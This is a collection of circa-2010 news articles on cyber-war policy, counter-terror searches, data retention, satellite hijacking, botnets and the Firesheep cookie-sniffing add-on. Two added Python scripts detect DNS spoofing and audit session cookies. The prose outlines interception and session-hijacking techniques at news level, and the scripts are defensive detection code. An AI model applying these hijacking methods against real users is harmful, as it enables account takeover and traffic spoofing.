“The lesson of Clipper is that the N.S.A. is really not good at what it does, and its desire to eavesdrop overwhelms its ability to protect, and puts at risk U.S. security,” Rotenberg said. “The N.S.A. wants security, sure, but it also wants to get to capture as much as it can. Its view is you can get great security as long as you listen in.” Rotenberg added, “General Alexander is not interested in communication privacy. He’s not pushing for encryption. He wants to learn more about people who are on the Internet”—to get access to the original internal protocol, or I.P., addresses identifying the computers sending e-mail messages. “Alexander wants user I.D. He wants to know who you are talking to.”

Rotenberg concedes that the government has a role to play in the cyber world. “We privacy guys want strong encryption for the security of America’s infrastructure,” he said. He also supports Howard Schmidt in his willingness to mandate encryption for the few industries whose disruption could lead to chaos. “Howard is trying to provide a reasoned debate on an important issue.”

Whitfield Diffie, the encryption pioneer, offered a different note of skepticism in an e-mail to me: “It would be easy to write a rule mandating encryption but hard to do it in such a way as to get good results. To make encryption effective, someone has to manage and maintain the systems (the way N.S.A. does for D.O.D. and, to a lesser extent, other parts of government). I think that what is needed is more by way of standards, guidance, etc., that would make it easier for industry to implement encryption without making more trouble for itself than it saves.”

More broadly, Diffie wrote, “I am not convinced that lack of encryption is the primary problem. The problem with the Internet is that it is meant for communications among non-friends.”

What about China? Does it pose such a threat that, on its own, it justifies putting cyber security on a war footing? The U.S. has long viewed China as a strategic military threat, and as a potential adversary in the sixty-year dispute over Taiwan. Contingency plans dating back to the Cold War include calls for an American military response, led by a Navy carrier group, if a Chinese fleet sails into the Taiwan Strait. “They’ll want to stop our carriers from coming, and they will throw whatever they have in cyber war—everything but the kitchen sink—to blind us, or slow our fleet down,” Admiral McVadon, the retired defense attaché, said. “Our fear is that the Chinese may think that cyber war will work, but it may not. And that’s a danger because it”—a test of cyber warfare—“could lead to a bigger war.”

However, the prospect of a naval battle for Taiwan and its escalation into a cyber attack on America’s domestic infrastructure is remote. Jonathan Pollack, an expert on the Chinese military who teaches at the Naval War College in Newport, Rhode Island, said, “The fact is that the Chinese are remarkably risk-averse.” He went on, “Yes, there have been dustups, and the United States collects intelligence around China’s border, but there is an accommodation process under way today between China and Taiwan.” In June, Taiwan approved a trade agreement with China that had, as its ultimate goal, a political rapprochement. “The movement there is palpable, and, given that, somebody’s got to tell me how we are going to find ourselves in a war with China,” Pollack said.

Many long-standing allies of the United States have been deeply engaged in cyber espionage for decades. A retired four-star Navy admiral, who spent much of his career in signals intelligence, said that Russia, France, Israel, and Taiwan conduct the most cyber espionage against the U.S. “I’ve looked at the extraordinary amount of Russian and Chinese cyber activity,” he told me, “and I am hard put to it to sort out how much is planning for warfare and how much is for economic purposes.”

The admiral said that the U.S. Navy, worried about budget cuts, “needs an enemy, and it’s settled on China,” and that “using what your enemy is building to justify your budget is not a new game.”

There is surprising unanimity among cyber-security experts on one issue: that the immediate cyber threat does not come from traditional terrorist groups like Al Qaeda, at least, not for the moment. “Terrorist groups are not particularly good now in attacking our computer system,” John Arquilla told me. “They’re not that interested in it—yet. The question is: Do vulnerabilities exist inside America? And, if they do, the terrorists eventually will exploit them.” Arquilla added a disturbing thought: “The terrorists of today rely on cyberspace, and they have to be good at cyber security to protect their operations.” As terrorist groups get better at defense, they may eventually turn to offense.

Jeffrey Carr, a Seattle-based consultant on cyber issues, looked into state and non-state cyber espionage throughout the recent conflicts in Estonia and Georgia. Carr, too, said he was skeptical that China or Russia would mount a cyber-war attack against the United States. “It’s not in their interest to hurt the country that is feeding them money,” he said. “On the other hand, it does make sense for lawless groups.” He envisaged “five- or six-year-old kids in the Middle East who are working on the Internet,” and who would “become radicalized fifteen- or sixteen-year-old hackers.” Carr is an advocate of making all Internet service providers require their customers to use verifiable registration information, as a means of helping authorities reduce cyber espionage.

Earlier this year, Carr published “Inside Cyber Warfare,” an account, in part, of his research into cyber activity around the world. But he added, “I hate the term ‘cyber war.’ ” Asked why he used “cyber warfare” in the title of his book, he responded, “I don’t like hype, but hype sells.”

Why not ignore the privacy community and put cyber security on a war footing? Granting the military more access to private Internet communications, and to the Internet itself, may seem prudent to many in these days of international terrorism and growing American tensions with the Muslim world. But there are always unintended consequences of military activity—some that may take years to unravel. Ironically, the story of the EP-3E aircraft that was downed off the coast of China provides an example. The account, as relayed to me by a fully informed retired American diplomat, begins with the contested Presidential election between Vice-President Al Gore and George W. Bush the previous November. That fall, a routine military review concluded that certain reconnaissance flights off the eastern coast of the former Soviet Union—daily Air Force and Navy sorties flying out of bases in the Aleutian Islands—were redundant, and recommended that they be cut back.

“Finally, on the eve of the 2000 election, the flights were released,” the former diplomat related. “But there was nobody around with any authority to make changes, and everyone was looking for a job.” The reality is that no military commander would unilaterally give up any mission. “So the system defaulted to the next target, which was China, and the surveillance flights there went from one every two weeks or so to something like one a day,” the former diplomat continued. By early December, “the Chinese were acting aggressively toward our now increased reconnaissance flights, and we complained to our military about their complaints. But there was no one with political authority in Washington to respond, or explain.” The Chinese would not have been told that the increase in American reconnaissance had little to do with anything other than the fact that inertia was driving day-to-day policy. There was no leadership in the Defense Department, as both Democrats and Republicans waited for the Supreme Court to decide the fate of the Presidency.

The predictable result was an increase in provocative behavior by Chinese fighter pilots who were assigned to monitor and shadow the reconnaissance flights. This evolved into a pattern of harassment in which a Chinese jet would maneuver a few dozen yards in front of the slow, plodding EP-3E, and suddenly blast on its afterburners, soaring away and leaving behind a shock wave that severely rocked the American aircraft. On April 1, 2001, the Chinese pilot miscalculated the distance between his plane and the American aircraft. It was a mistake with consequences for the American debate on cyber security that have yet to be fully reckoned.

No Terror Arrests in 100,000 Police Counter-Terror Searches, Figures Show

Just 504 people out of 101,248 searches under counter-terror powers last year were held for any offence, Home Office reveals
Alan Travis


More than 100,000 people were stopped and searched by police under counter-terrorism powers last year but none of them were arrested for terrorism-related offences, according to Home Office figures published today.

The statistics show that 504 people out of the 101,248 searches were arrested for any offence – an arrest rate of 0.5%, compared with an average 10% arrest rate for street searches under normal police powers.

The figures prompted the former Conservative home affairs spokesman David Davis to call for the controversial policy to be scrapped.

"This astonishing fact of no terrorism-related arrests, let alone prosecutions or convictions, in over 100,000 stop and searches, demonstrates what a massively counter-productive policy this is," said Davis.

"A policy which fuels resentment and antagonism amongst minority communities without achieving a single terrorist conviction serves only to help our enemies and increase the terrorism threat."

The annual Home Office bulletin on the use of terror powers also discloses for the first time that more than 85,000 people were questioned by police at airports and other border points in the last years under counter-terrorist legislation. More than 2,600 of them were held for more than an hour.

As Home Office ministers consider proposals to cut the current 28-day limit on detention without charge of terror suspects, the official figures reveal that nobody has been held longer than 14 days for the last two years before being charged or released.

The annual bulletin on the police use of counter-terrorism powers shows that, since the 9/11 attacks, 1,834 people have been arrested in Britain in connection with terrorism-related incidents.

A total of 1,000 of those suspects have been released without charge, 422 charged with terrorism-related offences, 228 with other crimes, and the remaining 184 dealt with by other action such as being transferred to the immigration authorities.

So far, 237 of those charged with terrorism-related offences have been convicted. There are 14 outstanding trials yet to be completed.

The Home Office figures show that 102 convicted terrorists were serving prison sentences – 84 of them Muslims – as of 31 March this year, with a further 25 released into the community after finishing their sentences in the last year.

The bulletin shows that the use of section 44 counter-terrorism stop and searches, which allowed the police to randomly search anyone without grounds for suspicion in a designated area, declined sharply in advance of a ruling earlier this year by the European court of human rights that it was unlawful.

There were 101,248 searches under these powers in 2009/10, a 60% reduction on the previous year. The vast majority were carried out by the Metropolitan police in London or by the British Transport police. The use of section 44 powers peaked at more than a quarter of a million searches in 2008/09 in the aftermath of the Haymarket bomb attack in London in 2007.

The figures show that 506 people were arrested as a result of the 101,248 searches and none of these arrests had anything to do with terrorism. Home Office statisticians say this arrest rate of 0.5% of searches under counter-terrorism powers compares with an average 10% arrest rate for searches under normal police powers.

The home secretary, Theresa May, is considering the future of section 44 under the review of counter-terrorism legislation which is due to report in the next few weeks. Since the Strasbourg ruling a residual power under section 44 has remained in force to allow the police to conduct random searches of vehicles.

The police use of section 44 to stop and search on the street has further declined since March, when the official figures were collected. An ethnic breakdown of the 101,248 searches shows that 59% of those stopped were white and 27% were black or Asian.

The counter-terrorism review is also looking at whether the 28-day limit for detaining terror suspects without charge should be retained, with Liberal Democrats pressing to reduce it to 14 days. The figures show that since the limit was raised from 14 to 28 days in 2006, 11 people have been detained for longer than 14 days. In the last two years nobody has been held without charge for longer than 14 days.

Privacy Commissioner Slams Data Retention
Josh Taylor and Darren Pauli

The Australian Privacy Commissioner Timothy Pilgrim has slammed the Federal Government's proposed data retention law and called for an inquiry to ensure data is not mishandled if the plan goes ahead.

Such a regime would require companies providing internet access to log and retain customers' private web browsing history for law enforcement to access when needed.

Speaking in Senate Estimates today, Pilgrim said he does not support the plan.

"The Privacy Commissioner does not support the collection of information on the chance that it would be useful later," Pilgrim said. "If you have data sitting around for a long time there is great risk that something could happen to it.

"We need to understand what is the exact problem being responded to [that] response is proportionate to the risk."

Pilgrim said the office has entered preliminary discussions on data retention with the Federal Attorney-General's Department and called for a "privacy assessment" should the proposal become legislation.

He said the scheme must be carefully assessed and exemptions should be minimised.

"What will be the accountability mechanisms … are there mechanisms to ensure it will be held securely and not beyond the expectation of the user?"

Pilgrim's comments are parting shots and the last comments he will make in estimates before his office is moved under the wing of the Australian Information Commissioner. His office will sit alongside the yet to be appointed Freedom of Information Commissioner.

Representatives from internet giant Google were also grilled as to whether the company had been briefed on the government's data retention policy.

"Has Google been consulted in the development of the Australian Government's data retention policy?" Greens Senator Scott Ludlam asked, noting the policy would be a recurring theme of the day.

"We haven't been involved in those discussions but obviously we've seen media reports and we are aware those discussions are going on," Iarla Flynn, Google's public policy and government affairs spokesperson said, adding that any plan would need to balance privacy and law enforcement requirements.

"Our view is that any requirement to retain data to enable the investigation, detection and prosecution of serious crimes has to be proportionate to the resultant privacy impact and anonymity loss for internet users as well as the cost to internet providers to implement that," he said.

Ludlam, Labor Senator Doug Cameron and Liberal Senator Mary Jo Fisher also questioned the representatives about how the company collects data on individuals and the transparency of measures it offers for users to erase information it holds on them. Google public policy and government affairs spokesperson Istar Vij used the example of deleting an email from a Gmail account.

"Once it's deleted and gone from our backup servers, it's gone," she said.

"From the entire techostratasphere?" Fisher asked.

"If I stored data with my Gmail account and I deleted it, it will be gone," Vij replied.

Fisher also asked the company if it performs the common task of collecting cookies to track web user histories.

How To Hack The Sky

A Spanish researcher demos new satellite-hijacking tricks with cybercriminal potential.
Andy Greenberg

Satellites can bring a digital signal to places where the Internet seems like a miracle: off-the-grid desert solar farms, the Arctic or an aircraft carrier at sea. But in beaming data to and from the world's most remote places, satellite Internet may also offer its signal to a less benign recipient: any digital miscreant within thousands of miles.

In a presentation at the Black Hat security conference in Arlington, Va., Tuesday, Spanish cybersecurity researcher Leonardo Nve presented a variety of tricks for gaining access to and exploiting satellite Internet connections. Using less than $75 in tools, Nve, a researcher with security firm S21Sec, says that he can intercept Digital Video Broadcast (DVB) signals to get free high-speed Internet. And while that's not a particularly new trick--hackers have long been able to intercept satellite TV or other sky-borne signals--Nve also went a step further, describing how he was able to use satellite signals to anonymize his Internet connection, gain access to private networks and even intercept satellite Internet users' requests for Web pages and replace them with spoofed sites.

"What's interesting about this is that it's very, very easy," says Nve. "Anyone can do it: phishers or Chinese hackers … it's like a very big Wi-Fi network that's easy to access."

In a penetration test on a client's network, Nve used a Skystar 2 PCI satellite receiver card, a piece of hardware that can be bought on eBay for $30 or less, along with open source Linux DVB software applications and the network data analysis or "sniffing" tool Wireshark.

Exploiting that signal, Nve says he was able to impersonate any user connecting to the Internet via satellite, effectively creating a high-speed, untraceable anonymous Internet connection that can be used for nefarious online activities.

Nve also reversed the trick, impersonating Web sites that a satellite user is attempting to visit by intercepting a Domain Name System (DNS) request--a request for an Internet service provider (ISP) to convert a spelled out Web site name into the numerical IP address where it's stored--and sending back an answer faster than the ISP. That allows him to replace a Web site that a user navigates to directly with a site of his choosing, creating the potential for undetectable cybercrime sites that steal passwords or install malicious software.

In his tests on the client's network, Nve says he was also able to hijack signals using GRE or TCP protocols that enterprises use to communicate between PCs and servers or between offices, using the connections to gain access to a corporation or government agency's local area network.

The Barcelona-based researcher tested his methods on geosynchronous satellites aimed at Europe, Africa and South America. But he says there's little doubt that the same tricks would work on satellites facing North America or anywhere else.

What makes his attacks possible, Nve says, is that DVB signals are usually left unencrypted. That lack of simple security, he says, stems from the logistical and legal complications of scrambling the signal, which might make it harder to share data among companies or agencies and--given that a satellite signal covers many countries--could run into red tape surrounding international use of cryptography. "Each [country] can have its own law for crypto," says Nve. "It's easier not to have encryption at the DVB layer."

Nve isn't the first to show the vulnerability of supposedly secure satellite connections. John Walker, a British satellite enthusiast, told the BBC in 2002 that he could watch unencrypted NATO video feeds from surveillance sorties in the Balkans. And the same lack of encryption allowed insurgents to hack into the video feed of unmanned U.S. drone planes scouting Afghanistan, the Wall Street Journal reported in December.

In fact, the techniques that Nve demonstrated are probably known to other satellite hackers but never publicized, says Jim Geovedi, a satellite security researcher and consultant with the firm Bellua in Indonesia. He compares satellite hacking to early phone hacking or "phreaking," a practice that's not well protected against but performed by only a small number of people worldwide. "This satellite hacking thing is still considered blackbox knowledge," he wrote in an e-mail to Forbes. "I believe there are many people out there who conduct similar research. They may have some cool tricks but have kept them secret for ages."

At last year's Black Hat D.C. conference, British cybersecurity researcher Adam Laurie demonstrated how he intercepts satellite signals with techniques similar to Nve's, using a DreamBox satellite receiver and Wireshark. But Nve argues that his method is far cheaper--Laurie's DreamBox setup cost around $750--and that he's the first to demonstrate satellite signal hijacking rather than mere interception.

"I'm not just talking about watching TV," says Nve. "I'm talking about doing some very scary things."
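The DNS race described in this article leaves a trace a defender can look for: one query answered twice, with the two answers disagreeing. The following Python is an added example, not part of the article or of Nve's presentation; it parses raw DNS responses and reports such conflicts. The capture tuples, host names and addresses are constructed sample data, and the two-second window is an assumption.

```python
import struct


def build_response(txid, qname, ipv4):
    """Serialise a minimal DNS response with one A record (test data only)."""
    name = b"".join(bytes([len(p)]) + p.encode("ascii") for p in qname.split("."))
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = name + b"\x00" + struct.pack("!HH", 1, 1)
    rdata = bytes(int(octet) for octet in ipv4.split("."))
    # 0xC00C is a compression pointer back to the question name at offset 12.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + rdata
    return header + question + answer


def read_name(packet, offset):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:  # compression pointer
            if end is None:
                end = offset + 2
            offset = ((length & 0x3F) << 8) | packet[offset + 1]
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels).lower(), (offset if end is None else end)


def parse_response(packet):
    """Return (transaction id, question name, frozenset of A-record addresses)."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", packet[:12])
    if not flags & 0x8000:
        raise ValueError("not a DNS response")
    offset, qname = 12, ""
    for _q in range(qdcount):
        qname, offset = read_name(packet, offset)
        offset += 4  # skip QTYPE and QCLASS
    addrs = set()
    for _a in range(ancount):
        _owner, offset = read_name(packet, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", packet[offset:offset + 10])
        offset += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:  # IN A
            addrs.add(".".join(str(b) for b in packet[offset:offset + 4]))
        offset += rdlen
    return txid, qname, frozenset(addrs)


def find_conflicts(capture, window=2.0):
    """Report queries answered twice with different A records.

    capture: iterable of (timestamp_seconds, client_ip, raw_dns_response).
    """
    first_seen, alerts = {}, []
    for ts, client, raw in sorted(capture, key=lambda rec: rec[0]):
        txid, qname, addrs = parse_response(raw)
        key = (client, txid, qname)
        if key not in first_seen:
            first_seen[key] = (ts, addrs)
            continue
        first_ts, first_addrs = first_seen[key]
        if ts - first_ts <= window and addrs != first_addrs:
            alerts.append({"client": client, "qname": qname, "txid": txid,
                           "first": sorted(first_addrs), "later": sorted(addrs),
                           "gap": ts - first_ts})
    return alerts


# Constructed capture: the first bank.example answer arrives well ahead of a
# second, different one; news.example is a harmless identical retransmission.
SAMPLE_CAPTURE = [
    (0.010, "10.0.0.5", build_response(0x1A2B, "bank.example", "203.0.113.66")),
    (0.620, "10.0.0.5", build_response(0x1A2B, "bank.example", "198.51.100.10")),
    (1.000, "10.0.0.5", build_response(0x2222, "news.example", "198.51.100.20")),
    (1.300, "10.0.0.5", build_response(0x2222, "news.example", "198.51.100.20")),
    (1.400, "10.0.0.9", build_response(0x1A2B, "mail.example", "198.51.100.30")),
]

if __name__ == "__main__":
    for alert in find_conflicts(SAMPLE_CAPTURE):
        print(alert)
```

Identical retransmissions are ignored, but a resolver that rotates addresses between retries can also trigger an alert, so each hit is a lead to check rather than proof of spoofing.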

The Rise of the Small Botnet

Smaller botnets are cheaper and easier to build out and operate, and criminals have already realized that large-scale botnets attract unwanted attention
Ram Mohan

In September, law enforcement agencies in the US and Europe announced that they had cracked a major ZeuS botnet operation allegedly responsible for the theft of over $70 million. Operation Trident Breach saw US agencies including the FBI, as well as police in the UK, Netherlands and Ukraine, charge or arrest the alleged gang ringleaders, along with over 100 people said to be the "money mules" responsible for electronically receiving and passing on the stolen cash. The sophisticated criminal operation was said to have compromised computers in at least 390 small and medium-sized businesses in the US alone, along with individuals and other organizations, in order to attempt to steal at least $220 million from bank accounts.

Reports of such law enforcement crackdowns are increasingly common, but they represent merely the tip of the iceberg in addressing the real underlying problem. Botnets controlled by criminal enterprises all over the world continue to multiply at a steep rate, and it is now arguably the smaller, harder-to-trace operations that organizations should be the most worried about. Not only are smaller botnets cheaper and easier to build out and operate, but criminals have already realized that large-scale botnet activity attracts unwanted attention, and not just of law enforcement. Late last year, an ad hoc coalition of security researchers seized the command and control servers at the center of the Mariposa botnet, essentially killing the beast by cutting off its head. By February this year the alleged mastermind behind the network had been arrested and charged, tracked down after his repeated attempts to regain control of his bots. While in control of the Mariposa C&C servers, the researchers discovered that over 12 million unique IP addresses, all compromised PCs, were attempting to connect, a startling illustration of just how large botnets have become these days.

Botnet management is an increasingly commoditized, automated and sophisticated activity that can put worryingly powerful technological weapons into the hands of criminals with little technical knowledge, and at a price point that won't hurt their wallet. Botnets smaller than those of the scale of Mariposa hide under the radar of major law enforcement efforts, and are becoming numerous enough to cause real concern.

Cybercrime Using Botnets

The development of the black market for botnet technology and services mirrors legitimate Internet industries. Today, would-be criminals can choose to buy the latest version of kits such as ZeuS, or even ready-made botnets, for as little as $2,500, which is not a large sum when you consider that the potential rewards could quickly add up to tens or even hundreds of thousands of dollars. Cracked versions of such tools are sometimes made available for free, which has caused some toolkit developers to add DRM protections to their software. Indeed, this industry has even taken advantage of the ease and scalability of cloud-based business models allowing customers to “rent” their fully hosted botnet solutions for as little as $60 a day. A one-hour DDoS attack can be rented for the price of a couple of cups of coffee, especially if you are a repeat customer who yields a recurring revenue stream for the botnet merchant. Botnet rental can even come with service-level agreements and customized control panels; the black market is almost as sophisticated as many legitimate online marketplaces.

Even if an enterprise is successful in preventing its endpoints being added to a botnet, it remains exposed to the external threat of other botnet-related attacks, such as DDoS, which are much harder to mitigate. While high-profile DDoS-related outages at highly trafficked sites such as Facebook and Twitter make headlines on a regular basis, thousands of similar attacks against targets small and large are recorded every week. As the number of botnets increases, so too does the amount of bandwidth available to the attackers controlling them. The largest single reported DDoS attack this year weighed in at a hefty 49 Gbps, more than enough to take all but the best-provisioned handful of sites in the world offline and to cause serious problems at core infrastructure bottlenecks.

So what can your business do to defend yourself from the threats that botnets pose to your daily business? First, smaller enterprises can find refuge in the Cloud. Relocating some critical functions to highly capable, redundantly provisioned cloud application providers can offer a "safety in numbers" defense against DDoS that would be prohibitively expensive if managed in-house. Larger organizations need to assess the capabilities of their data centers or hosting providers and ensure that critical infrastructure services such as DNS are not overlooked and do not become single points of failure.

Botnets are the Swiss army knife of attack tools. Once a computer has been compromised with bot software, malicious hackers can leverage its bandwidth to send spam, host illegal content or execute distributed denial of service attacks. As Operation Trident Breach showed, they can also be used more covertly, to secretly record keystrokes, stealing banking passwords in order to transfer large sums to the criminals. ZeuS, currently the most popular botnet creation and control tool, is specifically designed to steal passwords and other sensitive data. Remarkably, less than half of ZeuS-based bot variants are detected, on average, by commercial anti-virus software. The 2008-era Conficker botnet is like an active volcano, ready to erupt at any time. This means that any organization, regardless of size, has a responsibility to educate its employees on external risks and proper behavior to mitigate infection and improve the security of the enterprise network.

Criminals no longer need large botnets comprising hundreds of thousands of compromised machines in order to shut down enterprises, or even important pieces of the Internet. Smaller botnets are more than enough to take down significant core pieces of national or corporate infrastructure. The ability of defenders to thwart these attacks by over-provisioning their networks does not increase proportionally with the disruptive power of botnet-driven DDoS attacks, which will grow as more Internet users come online in developing nations and fast broadband connections become available more cheaply to home users that are less educated in proper security behavior. This growing Provisioning Gap should be one of the biggest security concerns for enterprises today, as it has the potential to make the small botnets of tomorrow every bit as scary as the large botnets of today.

Firefox Extension Makes Social Network ID Spoofing Trivial
Zeljka Zorz

A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.

"When it comes to user privacy, SSL is the elephant in the room," said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can "sniff out" the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other websites requiring a login, and simply hijack them and impersonate the user.

"As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed," explains Butler. "Double-click on someone, and you're instantly logged in as them."

It is not that this was impossible to do before the advent of Firesheep, but it required knowledge that average Internet users didn't have. "Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win," says Butler.

Whether he will succeed in pointing out the need for full end-to-end encryption and spurring websites into action remains to be seen. Among the websites whose cookies Firesheep can identify are Facebook, Flickr, Amazon.com, bit.ly, Google, Twitter, Yahoo, WordPress, and many others.

As I write this, the extension has been downloaded some 8,000 times, and the number is rising by the second. Wouldn't it be amazing that an action such as this could bring about the realization of a more secure Internet?

How to Protect Against Firesheep Attacks

Security experts today suggested ways users can protect themselves against Firesheep, the new Firefox browser add-on that lets amateurs hijack users' access to Facebook, Twitter and other popular services via Wi-Fi.

Firesheep adds a sidebar to Mozilla's Firefox browser that shows when anyone on an open network -- such as a coffee shop's Wi-Fi network -- visits an insecure site.

A simple double-click gives a hacker instant access to logged-on sites ranging from Twitter and Facebook to bit.ly and Flickr.

Since researcher Eric Butler released Firesheep on Sunday, the add-on has been downloaded nearly 220,000 times.

"I was in a Peet's Coffee today, and someone was using Firesheep," said Andrew Storms, director of security operations at San Francisco-based nCircle Security. "There were only 10 people in there, and one was using it!"

But users aren't defenseless, Storms and several other experts maintained.

One way they can protect themselves against rogue Firesheep users, experts said on Tuesday, is to avoid public Wi-Fi networks that aren't encrypted and available only with a password.

However, Ian Gallagher, a senior security engineer with Security Innovation, argued that tosses out the baby with the bathwater. Gallagher is one of the two researchers who debuted Firesheep last weekend at a San Diego conference.

"While open Wi-Fi is the prime proving ground for Firesheep, it's not the problem," Gallagher said in a blog post earlier on Tuesday. "This isn't a vulnerability in Wi-Fi, it's the lack of security from the sites you're using."

Free, open Wi-Fi is not only taken for granted by many, but it's not the problem. There are plenty of low-risk activities one can do on the Internet at a public hotspot, including reading news or looking up the address of a nearby eatery.

So if Wi-Fi stays, what's a user to do?

The best defense, said Chet Wisniewski, a senior security adviser at antivirus vendor Sophos, is to use a VPN (virtual private network) when connecting to public Wi-Fi networks at an airport or coffee shop, for example.

While many business workers use a VPN to connect to their office network while they're on the road, consumers typically lack that secure "tunnel" to the Internet.

"But there are some VPN services that you can subscribe to for $5 to $10 a month that will prevent someone running Firesheep from 'sidejacking' your sessions," Wisniewski said.

A VPN encrypts all traffic between a computer -- a laptop at the airport gate, for instance -- and the Internet in general, including the sites vulnerable to Firesheep hijacking. "It's as good a solution as there is," Wisniewski said, "and no different, really, than using encrypted Wi-Fi."

One provider, Strong VPN, prices its service starting at $7 per month or $55 per year.

Gallagher, however, warned that a VPN isn't a total solution. "That's just pushing the problem to that VPN or SSH endpoint," he said. "Your traffic will then leave that server just as it would when it was leaving your laptop, so anyone running Firesheep or other tools could access your data in the same way."

"A blind suggestion of 'use a VPN' doesn't really solve the problem and may just provide a false sense of security," he said.

Strong VPN disagreed. "Our servers are in a secure datacenter, so no one's going to be able to 'sniff' the traffic coming in or going out," a company spokesman countered. "All the traffic from, for example, your laptop in San Francisco, is encrypted when it goes to one of our U.S. servers."

Storms echoed Strong VPN's assertion. "I can see [Gallagher's point], that a VPN doesn't solve the root problem, which is on the service end," he said. "But although it's true that the traffic would be clear text when it leaves the VPN server for the site, it's very unlikely that someone would snoop that traffic."

Sean Sullivan, a security advisor with F-Secure, recommended Comodo's TrustConnect as "a VPN in all but name only." Comodo, a rival of F-Secure, sells the service for $7 per month or $50 annually.

If free is the object, there are options there, too, said Wisniewski, Sullivan and Gallagher, who pointed to a pair of free Firefox add-ons that force the browser to use an encrypted connection when it accesses certain sites.

One of those Firefox add-ons, HTTPS-Everywhere, provided by the Electronic Frontier Foundation (EFF), only works with a defined list of sites, including Twitter, Facebook, PayPal and Google's search engine.

The other choice, Force-TLS, serves the same purpose as the EFF's extension, but lets users specify which sites on which to enforce encryption.

However, other browsers, such as Microsoft's Internet Explorer and Google's Chrome, lack similar add-ons, leaving their users out in the cold.

"I expect that [Firesheep] will spur the EFF or others, maybe in the open source community, to some additional development [of such add-ons], maybe Chrome ports of those extensions," Sullivan said.

That could take months. In the meantime, Sullivan had another idea. "A MiFi device can encrypt [traffic], so with one you're always carrying your own Wi-Fi hotspot with you," he said.

MiFi isn't cheap, however. Verizon, for example, gives away the hardware but charges between $40 and $60 per month for the access to its 3G network.

Ultimately, moves users make to plug the holes Firesheep exposes are stop-gaps. The elephant in the room, said Butler and Gallagher as they defended the release of the add-on, is the lack of full encryption. And only the sites and services can fix that.

"The real story here is not the success of Firesheep but the fact that something like it is even possible," Butler wrote in his blog on Tuesday. "Going forward, the metric of Firesheep's success will quickly change from amount of attention it gains, to the number of sites that adopt proper security. True success will be when Firesheep no longer works at all."

But for the moment, even security professionals are worried. "I'm at the airport right now," Wisniewski told Computerworld. "And I'm wondering if someone is using Firesheep here. Maybe I should do a little 'shoulder browsing' to see if anyone has it running."

Source: http://www.computerworld.com/s/artic...pageN umber=2
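Butler and Gallagher's point that only the sites can fix the problem can be checked from the outside by looking at how a site issues its login cookies. The following Python is an added example, not code from the article, Firesheep or any of the add-ons named above: it audits response headers for session cookies that a listener on shared Wi-Fi could capture. The sample responses are constructed, and treating cookie names that contain "sess", "sid", "auth", "token" or "login" as login state is an assumption.

```python
from dataclasses import dataclass

# Assumption: cookie names containing these hints carry login state.
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class Finding:
    url: str
    cookie: str
    severity: str
    reason: str


def parse_set_cookie(value):
    """Split one Set-Cookie value into (cookie name, attribute dict)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_response(url, headers):
    """Flag session cookies that can end up on the wire unencrypted.

    headers is a list of (name, value) pairs so that repeated Set-Cookie
    headers are all seen.
    """
    over_tls = url.lower().startswith("https://")
    has_hsts = any(n.lower() == "strict-transport-security" for n, _ in headers)
    findings = []
    for header, value in headers:
        if header.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if not any(hint in cookie.lower() for hint in SESSION_HINTS):
            continue  # preference cookies and the like are not login state
        if over_tls and "secure" in attrs:
            continue  # only ever sent over TLS
        if not over_tls:
            severity, reason = "high", "cookie is set over plain HTTP"
        elif not has_hsts:
            # Without Secure, the browser attaches the cookie to any later
            # http:// request to the same host, in cleartext.
            severity, reason = "high", "no Secure attribute and no HSTS"
        else:
            # HSTS makes supporting browsers upgrade http:// requests, which
            # limits the exposure but does not replace the Secure attribute.
            severity, reason = "low", "no Secure attribute, HSTS present"
        findings.append(Finding(url, cookie, severity, reason))
    return findings


# Constructed sample responses (not captured traffic).
SAMPLES = [
    ("http://social.example/home",
     [("Set-Cookie", "session_id=abc123; Path=/; HttpOnly"),
      ("Set-Cookie", "lang=en; Path=/")]),
    ("https://shop.example/login",
     [("Set-Cookie", "auth_token=def456; Path=/; HttpOnly")]),
    ("https://photos.example/login",
     [("Strict-Transport-Security", "max-age=31536000"),
      ("Set-Cookie", "login_state=ghi789; Path=/")]),
    ("https://mail.example/login",
     [("Strict-Transport-Security", "max-age=31536000"),
      ("Set-Cookie", "SID=jkl012; Path=/; Secure; HttpOnly")]),
]


def audit_all(samples=SAMPLES):
    """Run the audit over every (url, headers) pair."""
    return [f for url, headers in samples for f in audit_response(url, headers)]


if __name__ == "__main__":
    for f in audit_all():
        print(f"{f.severity:4} {f.url} {f.cookie}: {f.reason}")
```

The second sample is the case that is easy to miss: the login page itself is served over HTTPS, yet the cookie still travels in cleartext on the first plain HTTP request to that host.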

How To Screw With Firesheep Snoops? Try FireShepherd
Andy Greenberg

The Web has been abuzz with warnings about Firesheep, a simple Firefox add-on that lets users steal cookies and snoop on the Facebook and Twitter activities of any fellow users on an unsecured wireless network.

Plenty of tools offer workarounds and protections for Firesheep’s data-sniffing trick, such as virtual private network tools and the EFF’s HTTPS Everywhere plug-in.

